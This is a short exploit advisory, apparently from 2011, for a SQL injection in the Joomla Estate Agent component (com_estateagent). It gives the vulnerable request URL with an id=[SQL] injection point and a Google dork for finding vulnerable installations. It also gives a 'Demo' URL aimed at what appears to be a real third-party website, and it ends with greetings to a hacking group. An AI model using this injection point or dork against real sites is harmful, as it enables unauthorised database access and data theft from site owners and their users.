The Joomla Estate Agent component suffers from a remote SQL injection vulnerability.
4f091c16f1baf1462cdf6db4db4060eada79cbaf2f1d4da6c23a3fbc563cd411
====================================================
Joomla Component (com_estateagent) <= SQL Injection Vulnerability
====================================================
# Exploit Title: Joomla Component (com_estateagent) <= SQL Injection
Vulnerability
# Date: 08 - 10 - 2011
# Author: BHG Security Center
# Software Link: http://www.joomla.com
# Contact : http://black-hg.org
# Download saftware :
http://www.freelancer.ph/job-search/componente-joomla-com_estateagent-download/
# Version: All version
# Google dork: inurl:index.php?option=com_estateagent
# Tested on: Linux
[*] ## ExPLo!T:
http://localhost/index.php?option=com_estateagent&act=object&task=showEO&id=[SQL]
Vunl Component : com_estateagent
Demo :
http://hpmic.com/index.php?option=com_estateagent&act=object&task=showEO&id=[SQL]
===============================================================================
# Greets To
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn
cmaxx M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y
THANKS TO ALL Iranian HackerZ
===============================================================================